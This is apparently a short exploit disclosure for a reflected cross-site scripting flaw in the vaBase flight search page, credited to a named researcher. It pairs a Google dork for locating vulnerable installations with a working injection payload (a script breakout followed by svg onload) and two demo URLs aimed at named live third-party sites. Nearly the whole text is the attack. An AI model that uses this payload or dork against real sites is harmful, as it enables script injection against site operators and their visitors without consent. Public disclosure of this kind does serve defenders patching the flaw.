#Exploit Title: vabase– Cross Site Scripting vulnerability (xss) #Date: 2020-08-13 #Exploit Author: Mostafa Farzaneh #Vendor Homepage: www.vabase.com #Google Dork: "Powered & Designed by vaBase.com" #Category: webapps #Tested On: windows 10, Firefox #Software Link: www.vabase.com Proof of Concept: 1-Search dork 2-https://target/flight_search.php?from=" > [XSS Inject Payload ] Demo: https://www.powersetva.com/flight_search.php?from=%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E&ac=B789&op=%&dur=2-4 Demo: http://livewireairlines.vabase.com/flight_search.php?from=%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E&ac=%&op=CYUL%20Montreal&dur=1-2 ********************************************************* #Discovered by: Mostafa Farzaneh from PywebSecurity team #Telegram: @pyweb_security *********************************************************